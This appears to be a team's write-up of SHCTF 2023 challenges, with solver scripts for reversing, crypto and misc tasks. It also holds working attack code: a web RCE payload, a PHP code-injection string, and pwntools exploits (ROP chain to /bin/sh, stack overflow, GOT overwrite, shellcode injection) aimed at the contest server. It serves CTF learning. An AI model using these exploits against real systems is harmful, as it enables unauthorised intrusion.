Writeup

SHCTF 2023

UKFC 2024 SHCTF Writeup

Re

[WEEK1]easy_re 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

a = [
  0x66, 0xC6, 0x16, 0x76, 0xB7, 0x45, 0x27, 0x97, 0xF5, 0x47, 
  0x03, 0xF5, 0x37, 0x03, 0xC6, 0x67, 0x33, 0xF5, 0x47, 0x86, 
  0x56, 0xF5, 0x26, 0x96, 0xE6, 0x16, 0x27, 0x97, 0xF5, 0x07, 
  0x27, 0x03, 0x26, 0xC6, 0x33, 0xD6, 0xD7, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00]
for i in a:
    print(chr(((i >> 4) & 0xff) | ((16 * i) & 0xff)),end='')

[WEEK1]ez_asm 

1
2
3

s = 'nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y'
for i in s:
    print(chr((ord(i)+0xa) ^ 0x1e),end='')

[WEEK1]seed 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

#include <bits/stdc++.h>
using namespace std;
int main()
{
        unsigned char des[] = {
  0x40, 0x29, 0x28, 0xE9, 0xC2, 0x04, 0xA4, 0xED, 0x9F, 0x53, 0x5F, 0x75, 0x3C, 0xD1, 0xCD, 0x2B, 0xA8, 0xC4, 0x89, 0x69, 0x15, 0x21, 0x16, 0xEF, 0xD7, 0x27, 0x92, 0xDF, 0xCA, 0x53, 0x5F, 0x2A, 0x3C, 0xD1, 0xCE, 0x03, 0xA3, 0xEF, 0xA5, 0x78, 0x16, 0x1A, 0x2D, 0xE1, 0xC4};
        int v5[20], v3;
        srand(0);
        for (int i = 0; i <= 9; ++i )
        {
                v3 = rand() % 255;
                v5[i] = v3;
        }
        for (int j = 0; j <= 44; ++j )
                des[j] ^= v5[j % 10];
        for (int j = 0; j <= 44; ++j )
            cout <<des[j];
    cout <<endl;
        return 0;
}

[WEEK1]signin

[WEEK1]easy_math 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

from z3 import *
s = z3.Solver()
# Generate an empty list with the same length as the flag
l0 = Int('l0')
l1 = Int('l1')
l2 = Int('l2')
l3 = Int('l3')
l4 = Int('l4')
l5 = Int('l5')

# add constraint condition
s.add((593*l0 + 997*l1 + 811*l2 + 258*l3 + 829*l4 + 532*l5)== 0x5b8e0aef71d34ff43)
s.add((605*l0 + 686*l1 + 328*l2 + 602*l3 + 695*l4 + 576*l5)== 0x551a262360964ef7f)
s.add((373*l0 + 512*l1 + 449*l2 + 756*l3 + 448*l4 + 580*l5)== 0x49d158a5657d6931c)
s.add((560*l0 + 635*l1 + 422*l2 + 971*l3 + 855*l4 + 597*l5)== 0x625568d5abbabf4f3)
s.add((717*l0 + 507*l1 + 388*l2 + 925*l3 + 324*l4 + 524*l5)== 0x50ee0c025e70e3c23)
s.add((312*l0 + 368*l1 + 884*l2 + 518*l3 + 495*l4 + 414*l5)== 0x40e735f8aa2815f65)

# Solve
r = s.check()
print(s.model())

1
2
3
4
5
6
7
8

s = [0x66,0x6c,0x61,0x67,0x7b,0x4e,0x30,
0x5f,0x4f,0x6e,0x65,0x5f,0x6b,0x6e,
0x30,0x77,0x73,0x5f,0x6d,0x40,0x74,
0x68,0x5f,0x42,0x33,0x74,0x74,0x65,
0x72,0x5f,0x54,0x68,0x40,0x6e,0x5f,
0x6d,0x65,0x21,0x21,0x21,0x21,0x7d]
for i in s:
    print(chr(i),end='')

[WEEK1]ez_apk 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

def base58_decode(encoded, alphabet):
    base_count = len(alphabet)
    decoded = 0

    for char in encoded:
        decoded = decoded * base_count + alphabet.index(char)

    decoded_bytes = decoded.to_bytes((decoded.bit_length() + 7) // 8, byteorder='big')  # 将整数转换为字节数组
    decoded_string = decoded_bytes.decode()
    return decoded_string


# 自定义映射表
custom_alphabet = "9LfnoVpi1HrzBSKxhNFeyY745R2g3QmqsTCZJuDvcMdkE8wPGbUXajtAW6"


encoded = '5TAYhycAPT1aAd535TGdWYQ8CvfoRjErGEreqhDpqv1LydTqd3mxuK2hhUp9Pws3u9mq6eX'

decoded = base58_decode(encoded, custom_alphabet)
print("Decoded:", decoded)

Web

[WEEK1]babyRCE

  • 简单过滤

[http://112.6.51.212/?rce=curl%09file:///flag-g]

[WEEK1]飞机大战

main.js

Unicode –> base64

[WEEK1]1zzphp 

1
2
3
4
5
6
7
8
9

import requests

url = 'http://112.6.51.212:30977/?num[]=1'
data = {
    'c_ode': 'aaaa'*250000+'2023SHCTF'
}

request = requests.post(url=url, data=data)
print(request.text)

[WEEK1]ezphp 

1
2
3

?code=${phpinfo()}

pattern=\S*

Cry

[WEEK1]凯撒大帝

[WEEK1]黑暗之歌 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

s = ['⠀', '⠁', '⠂', '⠃', '⠄', '⠅', '⠆', '⠇', '⠈', '⠉', '⠊', '⠋', '⠌', '⠍', '⠎', '⠏',
'⠐', '⠑', '⠒', '⠓', '⠔', '⠕', '⠖', '⠗', '⠘', '⠙', '⠚', '⠛', '⠜', '⠝', '⠞', '⠟',
'⠠', '⠡', '⠢', '⠣', '⠤', '⠥', '⠦', '⠧', '⠨', '⠩', '⠪', '⠫', '⠬', '⠭', '⠮', '⠯',
'⠰', '⠱', '⠲', '⠳', '⠴', '⠵', '⠶', '⠷', '⠸', '⠹', '⠺', '⠻', '⠼', '⠽', '⠾', '⠿',
'⡀', '⡁', '⡂', '⡃', '⡄', '⡅', '⡆', '⡇', '⡈', '⡉', '⡊', '⡋', '⡌', '⡍', '⡎', '⡏',
'⡐', '⡑', '⡒', '⡓', '⡔', '⡕', '⡖', '⡗', '⡘', '⡙', '⡚', '⡛', '⡜', '⡝', '⡞', '⡟',
'⡠', '⡡', '⡢', '⡣', '⡤', '⡥', '⡦', '⡧', '⡨', '⡩', '⡪', '⡫', '⡬', '⡭', '⡮', '⡯',
'⡰', '⡱', '⡲', '⡳', '⡴', '⡵', '⡶', '⡷', '⡸', '⡹', '⡺', '⡻', '⡼', '⡽', '⡾', '⡿',
'⢀', '⢁', '⢂', '⢃', '⢄', '⢅', '⢆', '⢇', '⢈', '⢉', '⢊', '⢋', '⢌', '⢍', '⢎', '⢏',
'⢐', '⢑', '⢒', '⢓', '⢔', '⢕', '⢖', '⢗', '⢘', '⢙', '⢚', '⢛', '⢜', '⢝', '⢞', '⢟',
'⢠', '⢡', '⢢', '⢣', '⢤', '⢥', '⢦', '⢧', '⢨', '⢩', '⢪', '⢫', '⢬', '⢭', '⢮', '⢯',
'⢰', '⢱', '⢲', '⢳', '⢴', '⢵', '⢶', '⢷', '⢸', '⢹', '⢺', '⢻', '⢼', '⢽', '⢾', '⢿',
'⣀', '⣁', '⣂', '⣃', '⣄', '⣅', '⣆', '⣇', '⣈', '⣉', '⣊', '⣋', '⣌', '⣍', '⣎', '⣏',
'⣐', '⣑', '⣒', '⣓', '⣔', '⣕', '⣖', '⣗', '⣘', '⣙', '⣚', '⣛', '⣜', '⣝', '⣞', '⣟',
'⣠', '⣡', '⣢', '⣣', '⣤', '⣥', '⣦', '⣧', '⣨', '⣩', '⣪', '⣫', '⣬', '⣭', '⣮', '⣯',
'⣰', '⣱', '⣲', '⣳', '⣴', '⣵', '⣶', '⣷', '⣸', '⣹', '⣺', '⣻', '⣼', '⣽', '⣾', '⣿']
print(len(s))
t = '⠴⡰⡭⡳⠴⡰⡭⡰⡷⡲⡢⡩⡭⡡⠯⡩⡭⡡⡺⡩⡭⡡⠳⡩⡭⡡⡺⡩⡭⡡⡶⡩⡭⡡⡶⡩⡭⡡⡲⡩⡭⡡⡺⡩⡭⡡⠯⡩⡧⡊⡢⡩⡭⡡⠯⡩⡭⡡⡺⡃⡰⠫⡋⡚⡲⡍⡋⡮⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡃⡴⡵⡋⡁⡬⡵⡋⡁⡬⡵⡋⡁⡬⡳⡋⠲⠴⡯⡃⡗⠴⡰⡭⡴⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡩⡭⡡⡺⡩⡭⡡⡺⡩⡭⡡⠳⡩⡧⡊⡢⡩⡭⡡⠯⡩⡧⡊⡢⡃⡴⡵⡋⡚⡱⠫⡋⡚⡱⠫⡋⡚⡲⠵⠲⡺⠰⠽'
for i in t:
    print(chr(s.index(i)),end='')

[WEEK1]小兔子可爱捏

  • 宇宙的终极答案是 42

flag{i_love_technology}

[WEEK1]okk

[WEEK1]迷雾重重

[WEEK1]进制

  • 两次 16 进制转文字

flag{ahfkjlhkah}

[WEEK1]what is m 

1
2
3

from Crypto.Util.number import bytes_to_long, long_to_bytes

print(long_to_bytes(7130439814057443337513081734473405090739779942575066260183826302073352109596131283637502871686512272788977886248607350692603913512995544061446958261011864073931428103911524197607344103371901))

[WEEK1]really_ez_rsa 

1
2
3
4
5
6
7
8
9

from Crypto.Util.number import *
p = 217873395548207236847876059475581824463
q = 185617189161086060278518214521453878483
c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
e = 65537
n = p * q
phi = (p-1)*(q-1)
d = inverse(e,phi)
print(long_to_bytes(pow(c,d,n)))

[WEEK1]残缺的md5 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

import hashlib

s = 'ABCDEFGHJKLMNPQRSTUVWXYZ0123456789'
key1 = 'KCLWG'
key2 = 'K8M9O3'
key3 = 'DE'
key4 = '84S9'
for i in s:
    for j in s:
        for k in s:
            temp= key1 + i + key2 + j + key3 + k + key4
            # 创建md5对象
            hl = hashlib.md5()
            hl.update(temp.encode(encoding='utf-8'))
            if 'B2AC4E6' in hl.hexdigest().upper():
                print(hl.hexdigest().upper())

[WEEK1]熊斐特

[WEEK1]难言的遗憾

[WEEK2]ez_rsa

  • 常规 RSA+RSA 共模

[WEEK2]e?

  • 有限域开方 + 中国剩余定理
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

p= 70724362259337647663584082414795381346569735601816096923682814277857463878289
q= 114427188167532721707398034034072867253267857672869034942206947096293901917007
e= 1314
c= 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304

R.<x> = Zmod(p)[]
f = x ^ e - c
f = f.monic()
res1 = f.roots()

R.<y> = Zmod(q)[]
f = y ^ e - c
f = f.monic()
res2 = f.roots()
print(res1)
print(res2)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

from math import gcd, sqrt

import libnum
from Crypto.Util.number import *
p= 70724362259337647663584082414795381346569735601816096923682814277857463878289
q= 114427188167532721707398034034072867253267857672869034942206947096293901917007
e= 1314
c= 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304
n = p*q
res1 = [(70724362259295513136647378065715849276316693089744659699199524218118849318420, 1), (42134526936704349079532070253042512071437224483290059738614559869, 1)]
res2 = [(114427188167490587180461329684993335183014815160797597717723657036555287357138, 1), (42134526936704349079532070253042512071437224483290059738614559869, 1)]

for i in res1:
    for j in res2:
        m =libnum.solve_crt([int(i[0]),int(j[0])],[p,q])#c3=libnum.solve_crt([c1,c2], [q1,q2])
        flag = long_to_bytes(m)
        if flag.startswith(b'flag'):
            print(flag)

[WEEK2]factorizing_n

  • n = p ** 5
  • yafu 分解直接逆
1
2
3
4
5
6
7

from Crypto.Util.number import *
c = 52409805591744226507807531465616894934028463651864630447934395956954575834603756391651746535033902964658694070544877880970130028487381287088425209448038533705903737694267359561133766799228825599943891152463160326583722749586721691729062524310148743637505134465210906856660867852927837112666513674858029892207902196213784902541173835447263733760225682942461048573387925463479672527491229113710629340960375692432470493054415657845868577650170648157402682163577152288432313996310562452677399267755695644659367792066311336521698894993982901657735586844358679888210537898629281625526455444811591386493005341435516094660429968084363084301878446471676122069724608083578102382181382107225473535696274374370868301830807644939881080301668756603163431000745972823980427048672732291
e = 65537
p = 11776588228599764849559519654482976956833367474471407292255776713760090338489966385328569279135095351660161277221351884258247731394014018172166064062551483
phi = (p-1)
d = inverse(e,phi)
print(long_to_bytes(pow(c,d,p)))

[WEEK2]easymath

  • LCG 已知连续 6 位,直接脚本解 abm 计算下一位即可

[WEEK2]XOR

  • 已知 p+q 和 p ^ q,逐字节爆破求解 pq

[WEEK2]哈希猫

  • 就是爆破 hash 值

Misc

[WEEK1]签到题

base64+64

[WEEK1]Steganography

  • 属性详细信息和下图,组合得到密钥解密

[WEEK1]可爱的派蒙捏

binwalk 分离 zip,然后读取两个文件的差异字节组成字符串

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

def compare_files(file1_path, file2_path):
    unique_to_file1 = ''
    unique_to_file2 = ''
    with open(file1_path, 'r') as file1:
        lines_file1 = file1.read()
    with open(file2_path, 'r') as file2:
        lines_file2 = file2.read()
    for i in range(len(lines_file2)):
        if lines_file1[i] != lines_file2[i]:
            unique_to_file1 = unique_to_file1 + lines_file1[i]
            unique_to_file2 = unique_to_file2 + lines_file2[i]
    return unique_to_file1, unique_to_file2

# 替换为你要比较的文件路径
file1_path = 'txt1.txt'
file2_path = 'txt2.txt'

unique1, unique2 = compare_files(file1_path, file2_path)
print(unique1)
print(unique2)

#dd8eg50c904def68d3db4bdlf8
#flag{4ebf327905288fca947a}

[WEEK2]奇怪的 screenshot

  • win11 截图 CVE + 百家姓加密

https://github.com/frankthetank-music/Acropalypse-Multi-Tool

Pwn

[WEEK1]nc

连上就有

[WEEK1] 四则计算器

绕过 strlen + backdoor 地址

[WEEK1]猜数游戏

常规猜测问题 服务器有延迟 多试几次就行

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

from pwn import *
import ctypes
import os
import time

# 加载libc库
libc = ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6")

# 连接到远程服务器
r = remote('112.6.51.212',31354)
#r = process("./guess")

# 设置随机种子
seed = int(time.time())
libc.srand(seed)

# 设置pwntools上下文
context(os='linux', log_level='debug', arch='amd64')

r.sendlineafter(b"number?",str(11))
r.sendlineafter(b"\n",str(libc.rand()))
# 发送选项并与服务器交互


r.interactive()

[WEEK1]hard nc

第一段 flag

1
2

ls -a
cat .gift

第二段 进入 gift2 获取 flag2 base64 解码即可

[WEEK1]ropchain

静态链接

ROPgadget –binary elf –ropchain 就给 rop 链

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

from pwn import*
r=remote("112.6.51.212",31399)
# Padding goes here
p = b'a'*0x28
#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401243) # syscall
r.sendline(p)
r.interactive()

[WEEK1]口算题

[WEEK1]babystack

给出了 hint 地址 0x400858

1
2
3
4
5
6
7

from pwn import *
r=remote("112.6.51.212",31513)
# Padding goes here         .rodata:0000000000400858 unk_400858      db  24h ; $
p = b'a'*0x28+p64(0x400581)+p64(0x400833)+p64(0x400858 )+p64(0x4005D0)

r.sendline(p)
r.interactive()

[WEEK1]showshowway

gdb 调试

输入位置和覆盖位置存在偏移 0x1100-0x10C0=0x40

再覆盖 y 的值==p

1
2
3
4
5

from pwn import*
r=remote("112.6.51.212",31521)
#r=process("")
r.sendline(b'a'*0x40+b'showshowway')
r.interactive()

[WEEK1]pkmon

整数溢出 + 修改 put 的 got 表

1
2
3
4
5
6

from pwn import *
r=remote("112.6.51.212",31650)
elf=ELF("./pkmon")
r.sendline(str(536870895))
r.sendline(p64(0x40072F))
r.interactive()

[WEEK2]easy_shellcode 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

from pwn import*
context.arch = 'amd64'
context(os='linux', log_level='debug')
p=remote('112.6.51.212',30749)
#p=process("./shellcode")
elf=ELF('./shellcode')
#libc=elf.libc
payload=b'a'*0xf+b'b'
def debug():
    gdb.attach(p)
    pause()
p.send(payload)
p.recvuntil(b'b')
stack=u64(p.recv(6).ljust(8,b'\x00'))-0x80
print(hex(stack))

payload=asm(shellcraft.sh()).ljust(0x78,b'a')+p64(stack)
p.sendline(payload)
p.interactive()
Licensed under CC BY-NC-SA 4.0
© 2024 - 2025 UKFC
使用 Hugo 构建
主题 StackJimmy 设计